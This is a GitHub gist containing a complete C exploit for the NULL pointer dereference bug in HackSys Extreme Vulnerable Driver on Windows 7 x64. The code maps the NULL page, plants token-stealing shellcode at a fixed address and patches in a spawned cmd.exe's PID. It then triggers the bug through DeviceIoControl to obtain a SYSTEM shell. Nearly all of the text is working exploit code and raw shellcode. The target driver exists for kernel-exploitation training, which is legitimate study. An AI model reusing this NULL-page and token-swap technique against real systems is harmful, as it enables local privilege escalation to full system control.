-
-
Save xpn/bbed0ffe5be9f7207031fbe471e82487 to your computer and use it in GitHub Desktop.
Exploit for NULL Pointer Dereference HEVD
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| #define HACKSYS_EVD_IOCTL_NULL_POINTER_DEREFERENCE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x80A, METHOD_NEITHER, FILE_ANY_ACCESS) | |
| typedef NTSTATUS(*WINAPI ZwAllocateVirtualMemory)( | |
| _In_ HANDLE ProcessHandle, | |
| _Inout_ PVOID *BaseAddress, | |
| _In_ ULONG_PTR ZeroBits, | |
| _Inout_ PSIZE_T RegionSize, | |
| _In_ ULONG AllocationType, | |
| _In_ ULONG Protect | |
| ); | |
| char shellcode[256] = { | |
| 0x50, 0x53, 0x51, 0x56, 0x57, 0x65, 0x48, 0x8b, 0x04, 0x25, | |
| 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x10, 0x02, 0x00, | |
| 0x00, 0x81, 0xb8, 0x80, 0x01, 0x00, 0x00, 0x41, 0x41, 0x41, | |
| 0x41, 0x74, 0x0f, 0x48, 0x8b, 0x80, 0x88, 0x01, 0x00, 0x00, | |
| 0x48, 0x2d, 0x88, 0x01, 0x00, 0x00, 0xeb, 0xe5, 0x48, 0x89, | |
| 0xc3, 0x83, 0xb8, 0x80, 0x01, 0x00, 0x00, 0x04, 0x74, 0x0f, | |
| 0x48, 0x8b, 0x80, 0x88, 0x01, 0x00, 0x00, 0x48, 0x2d, 0x88, | |
| 0x01, 0x00, 0x00, 0xeb, 0xe8, 0x48, 0x8b, 0x88, 0x08, 0x02, | |
| 0x00, 0x00, 0x48, 0x89, 0x8b, 0x08, 0x02, 0x00, 0x00, 0x5f, | |
| 0x5e, 0x59, 0x5b, 0x58, 0xc3, 0xff, 0xff, 0xff, 0xff, 0xff, | |
| 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, | |
| 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, | |
| 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, | |
| 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, | |
| 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, | |
| 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, | |
| 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, | |
| 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, | |
| 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, | |
| 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, | |
| 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, | |
| 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, | |
| 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, | |
| 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, | |
| 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, | |
| 0xff, 0xff, 0xff, 0xff, 0xff, 0xff | |
| }; | |
| int main() | |
| { | |
| printf("HACKSYS_EVD_IOCTL_NULL_POINTER_DEREFERENCE Windows 7 x64 exploit\n\t@_xpn_\n\n"); | |
| ZwAllocateVirtualMemory _ZwAllocateVirtualMemory = (ZwAllocateVirtualMemory)GetProcAddress(LoadLibraryA("ntdll.dll"), "ZwAllocateVirtualMemory"); | |
| PVOID memAddr = (PVOID)1; | |
| SIZE_T regionSize = 4096; | |
| char exploit[1024]; | |
| STARTUPINFOA si; | |
| PROCESS_INFORMATION pi; | |
| ZeroMemory(&si, sizeof(STARTUPINFO)); | |
| ZeroMemory(&pi, sizeof(PROCESS_INFORMATION)); | |
| printf("[*] Mapping NULL page via ZwAllocateVirtualMemory()\n"); | |
| NTSTATUS alloc = _ZwAllocateVirtualMemory( | |
| GetCurrentProcess(), | |
| &memAddr, | |
| 0, | |
| ®ionSize, | |
| MEM_COMMIT | MEM_RESERVE, | |
| PAGE_EXECUTE_READWRITE | |
| ); | |
| if (alloc != 0) { | |
| printf("[!] Error mapping memory\n"); | |
| return 0; | |
| } | |
| printf("[*] Success, memory mapped\n"); | |
| printf("[*] Opening handle to device driver\n"); | |
| HANDLE driverHandle = CreateFileA( | |
| "\\\\.\\HackSysExtremeVulnerableDriver", | |
| GENERIC_READ | GENERIC_WRITE, | |
| 0, | |
| NULL, | |
| OPEN_EXISTING, | |
| FILE_ATTRIBUTE_NORMAL, | |
| NULL | |
| ); | |
| if (driverHandle == INVALID_HANDLE_VALUE) { | |
| printf("[!] Error opening handle\n"); | |
| return 0; | |
| } | |
| printf("[*] Handle opened successfully\n"); | |
| printf("[*] Spawning a new cmd.exe process\n"); | |
| si.cb = sizeof(STARTUPINFOA); | |
| if (!CreateProcessA( | |
| NULL, | |
| (LPSTR)"cmd.exe", | |
| NULL, | |
| NULL, | |
| true, | |
| CREATE_NEW_CONSOLE, | |
| NULL, | |
| NULL, | |
| &si, | |
| &pi | |
| )) { | |
| printf("[!] FATAL: Error spawning cmd.exe\n"); | |
| return 0; | |
| } | |
| printf("[*] cmd.exe spawned\n"); | |
| Sleep(1000); | |
| printf("[*] Updating our shellcode to search for PID %d\n", pi.dwProcessId); | |
| *(DWORD *)((char *)shellcode + 27) = pi.dwProcessId; | |
| printf("[*] Setting Callback() pointer at 0x08 to point to shellcode\n"); | |
| *(unsigned long long*)0x8 = 0x100; | |
| printf("[*] Copying shellcode to 0x100\n"); | |
| memcpy((void*)0x100, shellcode, sizeof(shellcode)); | |
| printf("[*] Sending IOCTL to trigger exploit\n"); | |
| memset(exploit, 'A', sizeof(exploit)); | |
| DeviceIoControl( | |
| driverHandle, | |
| HACKSYS_EVD_IOCTL_NULL_POINTER_DEREFERENCE, | |
| exploit, | |
| sizeof(exploit), | |
| NULL, | |
| 0, | |
| NULL, | |
| NULL | |
| ); | |
| printf("[*] Done, enjoy your new system shell :)\n"); | |
| return 0; | |
| } | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment